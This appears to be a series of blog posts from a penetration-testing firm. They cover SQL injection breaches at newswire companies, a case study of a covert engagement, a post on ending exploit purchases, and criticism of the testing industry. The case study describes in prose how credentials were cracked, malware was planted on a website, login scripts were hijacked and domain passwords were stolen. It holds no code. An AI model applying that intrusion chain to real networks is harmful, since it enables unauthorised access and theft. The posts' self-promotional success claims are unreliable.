From the published record we know that Marketwired was hacked via the exploitation of SQL Injection vulnerabilities.  We know that the hacking was ongoing for a three-year period.  Additionally, according to the records the SQL Injection attacks happened on at least 390 different occasions over a three-month span (between April 24th 2012 and July 20th, 2012).  We assume that Marketwired was unaware of this activity because no responsive measures were taken until years after the initial breach and well after damage was apparently realized.
With regards to SQL Injection, an attacker usually needs build the attack through a process of trial and error, which generates an abundance of suspicious error logs.  In rare cases when an attacker doesn’t need to build the attack the actual attack will still generate a wealth of suspicious log events.  Moreover, SQL Injection made its debut 17 years ago in a 1998 release of phrack magazine, a popular hacking zine.   Today SQL Injection is a well-known issue and relatively easy to mitigate, detect, and/or defeat.  In fact almost all modern firewalls and security appliances have SQL Injection detection / prevention built in. When considering normally overt nature of SQL Injection, the extended timeframe of the activity, and the apparent lack of detection by Marketwired, it strongly suggests that Marketwired’s security was (and may still be) exceptionally deficient.
It is Netragard’s experience from delivering Platinum level (realistic threat) Penetration Tests that businesses have a 30-minute to 1-hour window in which to detect and respond to an initial breach. When Netragard’s team breaches a customer network, if the customer fails to detect and revoke Netragard’s access within the aforementioned timeframe then the customer will likely not be able to forcefully expel Netragard from its network. Within a 30-minute window of initial penetration Netragard is 89% likely to compromise its customers domain controller(s) and achieve total network dominance. Within a 1-hour window of initial penetration Netragard in 98% likely to compromise its customers domain controller(s) and achieve total network dominance.
We know that Marketwired’s failure to detect the initial breach (and subsequent attacks) provided the hackers with ample time to metastasize their penetration throughout the network. The published record states that the hackers “installed multiple reverse shells”. The record also states “in or about March 2012, the Hackers launched an intrusion into the networks of Marketwired whereby they obtained contact and log-in credential information for Marketwired’s employees, clients, and business partners.” We assume that the compromise of “log-in credential information” means that the hackers successfully compromised Marketwired’s domain controllers and exfiltrated / cracked their database of employee usernames and passwords. Given the fact that people tend to use the same passwords in multiple places (discussed later as well) the potential impact of this almost immeasurable.
While considerably less information about the breach into PRN’s network is available, the information that is public outlines significant security deficiencies existed. According to the published record PRN detected the intrusions into their network well after the network was breached which represents a failure at effective incident detection. Moreover, it appears that PRN’s response was largely ineffective because PRN ejected the hackers from the network but the hacker’s regained access. According to the record it appears that the dance of ejection and re-breach happened at least three times.
The third breach into PRN is very telling. This time the hackers purchased a list of logins taken from a compromised social networking website. The hackers then “reviewed and collected usernames and logins for PRN employees” from that list and used the collected information “to access the Virtual Private Network (“VPN”) or PRN”. Clearly PRN did not use two-factor authentication for its VPN, which would have prevented this method of penetration. It is also important to note that two-factor authentication is necessary to satisfy some regulatory requirements. Additionally, PRN’s policy around password usage and password security is seriously deficient or not being adhered to. Specifically, PRN employees were using the same passwords on social media websites (and possibly other places) as they were for PRN’s network.   As with Marketwired’s breach, PRN’s were very likely preventable.
Even less information is available about Business Wire’s breach. According to the records Business Wire’s network was initially breached via SQL Injection (like Marketwired) by another hacker at an earlier time. Iermolovych (the name of the hacker who hacked the Newswires) purchased access to Business Wire’s network from the other hacker. As with Marketwired and PRN, Business Wire’s own detection and response capabilities were (and may still be) lacking. It is unclear from the record as to how long the hackers were able to operate within Business Wire’s network but it is clear that the initial SQL Injection attack and subsequent breach was not detected or responded to in a timely manner.
Unfortunately, based on our own experience, most businesses are as vulnerable as the Newswires. The reasons for this are multifaceted we may cover them in another article at a later time. For now, we’ll focus on what could have been done to prevent the damages that resulted from this breach. It’s important to stress that every network will be breached at some point during its lifetime. The question is will the Incident Response be effective at detecting the breach and preventing it from becoming damaging.
To understand the solution we must first understand the problem. Damaging breaches have two common characteristics, which are poor network security and ineffective Incident Response. We know from studying historical breach data from the Verizon DBIR and OWASP that approximately 99.8% of all breaches are the product of the exploitation of known vulnerabilities for which CVE’s have already been published (may for over one year). This validates our first characteristic. The second characteristic is validated by the ever increasing number of damaging braches that are reported each year. The fact that these breaches are damaging shows that Incident Response has failed.
Most of the reported breaches in the past decade could have been avoided by proactively countering the two aforementioned points of failure. Countering these failure points requires actionable intelligence about how a threat will align with the unique risks of each associated network and how sensitive data will be accessed. The best method of assembling this intelligence is to become the victim of a breach not through malicious hacking but instead through high-quality, realistic-threat penetration testing.   Unfortunately this isn’t as easy as it sounds. The industry standard penetration test is a vetted vulnerability scan which is far from realistic and provides no real protective benefit. There are a few realistic threat penetration-testing vendors in operation but finding them can be a challenge.
Some of the characteristics of a realistic threat penetration test include but are not limited to social engineering with solid pretexts, undetectable malware, the non-automated identification and exploitation of network and web application vulnerabilities, exploit customizations, and stealth penetration. A realistic penetration testing team will never request that its IP addresses be whitelisted nor will they request credentials (unless perhaps for web application testing). The team will similarly not be dependent on (and may elect not to even use) automated tools like Nessus, Nexpose, The Metasploit Framwork, etc. Automated tools are useful for basic security & maintenance purposes but not for the production of realistic threats. Do you think the hackers that hacked Target, Sony, Hannaford, LinkedIn, The Homedepot, Ashley Madison, or The Newswires used those scanners?
The report generated by a realistic penetration test should cover the full spectrum of vulnerabilities as well as the Path to Compromise (PTC). The PTC represents the path(s) that an attacker must follow to compromise sensitive data from a defined source (Internet, LAN, etc.). Identifying the PTC is arguably more important from a defensive perspective than vulnerability identification. This is because it is technically impossible to identify every vulnerability that exists in a network (or in software) and so there will always exist some level of gap. Identifying the PTC allows a business mitigate this gap by creating an effective IR plan capable of detecting and responding to a breach before it becomes damaging. Netragard’s platinum level Network Penetration Testing services produce a high-detail PTC for exactly this reason.
The Newswires (and many other businesses) could likely have prevented their breach if they had done the following.

  1. Deployed a response-capable Web Application Firewall and configured the firewall specifically for the application(s) that it was protecting. This would have prevented the SQL Injection attacks from being successful.
  2. Deployed a Network Intrusion Detection / Prevention solution to monitor network traffic bidirectionally. This would likely have enabled them to detect the reverse-shells.
  3. Deployed a Data Loss Prevention solution. This would likely have prevented some if not all of the released from being exfiltrated.
  4. Deployed a SEIM capable of receiving, correlating and analyzing feeds from system logs, security appliances, firewalls, etc. This would likely have allowed the Newswires to detect and respond to the initial attacks before breach and well before damage.
  5. Purchased realistic-threat penetration testing that produced a report containing a detailed PTC and then implemented the suggested methods for mitigation, remediation, and hardening provided in the report. The test would enable them to measure the effectiveness of their existing security solutions and to close any gaps that might exist.
  6. To deploy an internal honeypot solution (like Netragard’s) that would detect lateral movement (Distributed Metastasis) inside of their networks and allow the Newswires to respond prior to experiencing any damage.

Records for reference

Enemy of the state

A case study in Penetration Testing
We haven’t been blogging as much as usual largely because we’ve been busy hacking things.   So, we figured that we’d make it up to our readers by posting an article about one of our recent engagements. This is a story about how we covertly breached a highly sensitive network during the delivery of a Platinum level Penetration Test.

First, we should make clear that while this story is technically accurate certain aspects have been altered to protect our customer’s identity and security. In this case we can’t even tell you if this was for a private or public sector customer. At no point will ever write an article that would put any of our customers at risk. For the sake of intrigue lets call this customer Group X.

The engagement was designed to produce a level of threat that would exceeded that which Group X was likely to face in reality. In this case Group X was worried about specific foreign countries breaching their networks. Their concern was not based on any particular threat but instead based on trends and what we agreed was reasonable threat intelligence.   They were concerned with issues such as watering holes, spear phishing, 0-day malware, etc. They had reason for concern given that their data was and still is critically sensitive.

We began work like any experienced hacker would, by performing social reconnaissance. Social reconnaissance should always be used before technical reconnaissance because it’s passive by design. Social reconnaissance when done right will provide solid intelligence that can be used to help facilitate a breach. In many cases social reconnaissance can eliminate the need for active technical reconnaissance.

Just for the sake of explanation, technical reconnaissance includes active tasks like port scanning, web server scanning, DNS enumeration, etc. Technical reconnaissance is easier to detect because of its active methods. Social reconnaissance, when done right, is almost impossible to detect because it is almost entirely passive. It leverages tools like Google, Maltego, Censys, etc. to gather actionable intelligence about a target prior to attack.

Our social reconnaissance efforts identified Group X’s entire network range, a misconfigured public facing document repository (that did not belong to Group X but was used by them and their partners/vendors), and a series of news articles that were ironically focused on how secure Group X was. One of the articles went so far as to call Group X the “poster child of good security”.

We began by exploring the contents of the aforementioned document repository. The repository appeared to be a central dumping ground for materials Group X wanted to share with third parties, including vendors. While digging through the information all of it appeared to be non-sensitive and mostly intended for public consumption. As we dug further we uncovered a folder called WebServerSupport and contained within that folder was a file called “encyrypted.zip”. Needless to say we downloaded the file.

We were able to use a dictionary attack to guess the password for the zip file and extract its contents. The extracted files included a series of web server administration guides complete with usernames, passwords, and URL’s. One of the username, password and URL combinations was for Group X’s main website (https://www.xyxyxyxyxy.com/wp-admin,username,password). When we browsed to https://www.xyxyxyxyxy.com/wp-admin we were able to login using the credentials. With this level of access we knew that it was time to poison the watering hole. (https://en.wikipedia.org/wiki/Watering_Hole)

To accomplish this we deployed our malware framework into the webserver (www.xyxyxyxyxy.com). Our framework is specifically designed to allow us to control who is infected. We are able to select targets based on their source IP address and other information identifying information. When a desired target connects to the watering hole (infected website) our framework deploys our 0-day pseudo-malware (RADON) into the victim’s computer system.   RADON then establishes persistence and connects back to our command and control server. From there we are able take complete control of the newly infected computer.
Netragard RADON v2.0 Strand Generator
radon_gen
RADON is not the same RADON used by the National Security Agency (NSA) as was speculated by the InfoSec institute. RADON does appear similar in some respects. It relies on side channel communications that cannot be disrupted without breaking core network protocols. It was designed to be far safer than other tools that tend to leave files behind (like Metasploit’s meterpreter). All strands of RADON are built with an expiration date that when reached trigger a clean uninstall and render the original source inert. We designed RADON specifically because we needed a save, clean and reliable method to test our customers at high levels of threat.

After the malware framework was deployed and tested, we scheduled it to activate the next business day. The framework was designed to infect one target then sleep until we instructed it to infect the next. This controlled infection methodology helps to maintain stealth. By 9:30 AM EST our first RADON strand called home. When we reviewed the connection we learned that we had successfully infected a desktop belonging Group X’s CIO’s assistant. We confirmed control and were ready to begin taking the domain (which as it turns out was ridiculously easy).

One of the first things we do after infecting a host is to explore network shares. During this test we quickly located the “scripts” share, which contained all of the login scripts for domain users. What we didn’t expect was that we’d be able to read, write, and otherwise modify every single one of those startup scripts. We were also able to create new scripts, new files and directories within the scripts directory. So uploaded RADON to the share and added a line to every login script that would run RADON every time a user logged into a computer. We quickly infected everything on the network.

After parsing through the onslaught of new inbound RADON connections we were able to identify personal user accounts belonging to network administrators. As it turned out most of the administrators personal accounts also had domain admin privileges. We leveraged those accounts to download the username and password database (ntds.dit) from the domain controller. Then we used RADON to exfiltrate the password database and dump it on one of our GPU password-cracking machines. We were able to crack all of the current and historical passwords in less than 2 hours time. What really surprised us was that 90% of the passwords were exactly identical.

Initially we thought that this was due to an error.   But after further investigation we realized that this common password could be used to login using all of the different domain accounts. It became even more interesting when we began to explore the last password change dates. We found that nearly 100% of the passwords had never been changed and that some of the accounts were over a decade old, still active, but no longer being used by anyone. We later found out that employees that had been terminated never had their accounts deactivated. When we confronted the customer with this they told us that it was their policy to not change passwords. When we asked them why they pointed to an article written by Bruce Schneier. (Sorry Bruce, but this isn’t the first time you’ve made us question you.)

At this point in the engagement we had more control over our customer’s infrastructure than they did. We were able to control all of their critical devices including but not limited to antivirus solutions, firewalls, intrusion detection and prevention systems, log correlation systems, switches, routers and of-course their domain. We accomplished this without triggering a single event and without any suspicion.

The last two tasks that remained were trophy gathering and vulnerability scanning. Trophy gathering was easy given the level of access that we had. We simply searched the network for .pdf, .doc,.docx,.xlsx, etc. and harvested files that looked interesting. We did find about a dozen reports from other penetration testing vendors as well. When we looked at those reports they presented Group X’s network as well managed and well protected. The only vulnerabilities that were identified were low and medium level vulnerabilities, none of which were exploitable.

When we completed our final task which was vulnerability scanning and vetting, our scanners produced results that were nearly identical to the other penetration testing vendor reports that we exfiltrated. Things like deprecated SSL, open ports, etc. were reported but nothing that could realistically lead to a network compromise. When we scanned Group X’s network from the perspective of an Internet based threat no vulnerabilities were reported. Our scans resulted in their security team becoming excited and proud because they “caught” and “prevented our intrusion attempt. When we told them to check their domain for a Netragard domain admin account, their excitement was over.

Exploit Acquisition Program Shut Down

We’ve decided to terminate our Exploit Acquisition Program (again).   Our motivation for termination revolves around ethics, politics, and our primary business focus.  The HackingTeam breach proved that we could not sufficiently vet the ethics and intentions of new buyers. HackingTeam unbeknownst to us until after their breach was clearly selling their technology to questionable parties, including but not limited to parties known for human rights violations.  While it is not a vendors responsibility to control what a buyer does with the acquired product, HackingTeam’s exposed customer list is unacceptable to us.  The ethics of that are appalling and we want nothing to do with it.

While EAP was an interesting and viable source of information for Netragard it was not nor has it ever been Netragard’s primary business focus. Netragard’s primary focus has always been the delivery of genuine, realistic threat penetration testing services.  While most penetration testing firms deliver vetted vulnerability scans, we deliver genuine tests that replicate real world malicious actors.  These tests are designed to identify vulnerabilities as well as paths to compromise and help to facilitate solid protective plans for our customers.

It is important to mention that we are still in strong favor of ethical 0-day development, brokering and  sales.  The need for 0-days is very real and the uses are often both ethical and for the greater good. One of the most well known examples was when the FBI used a FireFox 0-day to target and eventually dismantle a child pornography ring.  People who argue that all 0-day’s are bad are either uneducated about 0-days or have questionable ethics themselves.  0-days’s are nothing more than useful tools that when placed in the right hands can benefit the greater good.

If and when the 0-day market is correctly regulated we will likely revive EAP.  The market needs a framework (unlike Wassenaar) that holds the end buyers accountable for their use of the technology (similar to how guns are regulated in the US).  Its important that the regulations do not target 0-days specifically but instead target those who acquire and use them.  It is important to remember that hackers don’t create 0-day’s but that software vendors create them during the software development process.  0-day vulnerabilities exist in all major bits of software and if the good-guys aren’t allowed to find them then the bad-guys will

What real hackers know about the penetration testing industry that you don’t.

The information security industry has become politicized and almost entirely ineffective as is evidenced by the continually increasing number of compromises. The vast majority of security vendors don’t sell security; they sell political solutions designed to satisfy the political security needs of third parties. Those third parties often include regulatory bodies, financial partners, government agencies, etc.   People are more concerned with satisfying the political aspects of security than they are with actually protecting themselves, their assets, or their customers from risk and harm.

For example, the Payment Card Industry Data Security Standard (PCI-DSS) came into existence back on December 15th, 2004. When the standard was created it defined a set of requirements that businesses needed to satisfy in order to be compliant. One of those requirements is that merchants must undergo regular penetration testing. While that requirement sounds good it completely fails to define any realistic measure against which tests should be performed. As a result the requirement is easily satisfied by the most basic vetted vulnerability scan so long as the vendor calls it a penetration test (same is still largely true for PCI 3.0).

To put this into perspective the V0 and V50 ballistics testing standards establish clear requirements for the performance of armor. These requirements take into consideration the velocity of a projectile, size of a projectile, number of strikes, etc. If penetration is achieved when testing against the standards then the armor fails and is not deployable.   If PCI-DSS were used in place of the V0 and V50 standards then it would suffice to test a bulletproof vest with a squirt gun.   In such a case the vest would be considered ready for deployment despite its likely failure in a real world scenario.

This is in part what happened to Target and countless others. Target’s former CEO, Gregg Steinhafel was quoted saying “Target was certified as meeting the standard for the payment card industry (PCI) in September 2013. Nonetheless, we suffered a data breach.” What does that tell us about the protective effectiveness of PCI? What good is a security regulation if it fails to provide the benefit that it was designed to deliver? More importantly, what does that say about the penetration testing industry as a whole?

While regulations are ineffective it is the customers choice to be politically oriented or security focused. In 2014, 80% of Netragard’s customers opted to receive political security testing services (check in the box) rather than genuine security testing services even after having been educated about the differences between both. Most businesses consider the political aspect of receiving a check in the box to be a higher priority than good security (this is also true of the public sector).

This political agenda motivates decision makers to select penetration testing vendors (or other security solutions) based on cost rather than quality. Instead of asking intelligent questions about the technical capabilities of a penetration testing team they ask technically irrelevant questions about finances, the types of industries that vendor may have serviced, if a vendor is in Gartner’s magic quadrant, etc. While those questions might provide a vague measure (at best) of vendor health they completely fail to provide any insight into real technical capability.   The irony is that genuine penetration testing services maintain both lower average upfront costs and lower average long-term costs than political penetration testing services.

The lower average upfront cost of genuine penetration testing comes from the diagnostic pricing methodology (called Attack Surface Pricing or ASMap Pricing) that genuine penetration testing vendor’s depend on. ASMap pricing measures the exact workload requirement by diagnosing every in-scope IP address and Web Application (“Target”) during the quote generation process. Because each Target offers different services, each one also requires a different amount of testing time for real manual testing. ASMap pricing never results in an overcharge or undercharge and is a requirement for genuine manual penetration testing. In fact, diagnostic pricing is the de facto standard for all service based industries with the exclusion of political penetration testing (more on that later).

The lower long-term costs associated with genuine penetration testing stem from the protective nature of genuine penetration testing services. If the cost in damages of a single successful compromise far exceed the cost of good security then clearly good security is more cost effective. Compare the average cost in damages of any major compromise to the cost of good security. Good security costs less, period.

Political penetration testing (the industry norm) uses a Count Based Pricing (“CBP”) methodology that almost always results in an overcharge. CBP takes the number of IP addresses that a customer reports to have and multiplies it by a cost per IP. CBP does not diagnose the targets in scope and is a blind pricing methodology. What happens if a customer tells a vendor that they have 100 IP addresses that need testing but only 1 IP address offers any connectable services? If CBP is being used then the customer will be charged for testing all 100 IP addresses when they should only be charged for 1. Is that ethical pricing?

A good example of CBP overcharge happened to one of our customers last year. This customer approached Netragard and another well-known Boston based firm.   The other firm produced a proposal using CBP based on the customer having 64 IP addresses. We produced a proposal using the ASMap methodology. When we presented our proposal to the customer ours came in over $55,000.00 less than the other vendor.   When the customer asked us how that was possible we explained that of their 64 IP addresses only 11 were live. Of the 11 only 2 presented any real testable surface. Needless to say the other vendor didn’t win the engagement.

CBP cannot be used to price a manual penetration testing engagement because it also runs the risk of undercharging. Any engagement priced with the CBP methodology is dependent on vulnerability scanning. This is because CBP is a blind pricing methodology that does not diagnose workload. If a customer is quoted at $5,000 to test 10 IP addresses CBP assumes the workload for the 10 IP addresses.

What happens if each IP address requires 10 hours of manual labor? Engagements priced with CBP rely on automated scanners to compensate for these potential overages and to ensure that the vendor always makes a profit.   Unfortunately this dependence on automated scanning degrades the quality of the engagement significantly.  The political penetration testing industry falsely promises manual services when in fact the final deliverable is more often than not a vetted vulnerability scan. This promotes a false sense of security that all too often leads to compromise.

Customers can choose to be lazy and make naïve, politically oriented security decisions or they can self-educate, choose good security and save themselves considerable time and money.   While the political security path appears simple and easy at the onset the unforeseen complexities and potential damages that lie are all too often catastrophic. How much money is your business worth and what are you doing to truly protect it?

We’re offering a challenge to anyone willing to accept. If you think that your network is secure then let us test it with our unrestricted methodology. If we don’t compromise your network then the test is done free of charge. If we do compromise then you pay cost plus 15%.   During the test we expect you to respond the same way that you would a real threat. We don’t expect to be whitelisted and we don’t expect you to lower your defenses. Before you accept this challenge let it be known that we’ve never failed. To date our unrestricted methodology maintains a 100% success rate with an average time to compromise of less than 4 hours. Chances are that you won’t know we’re in until it’s too late.

Do you accept?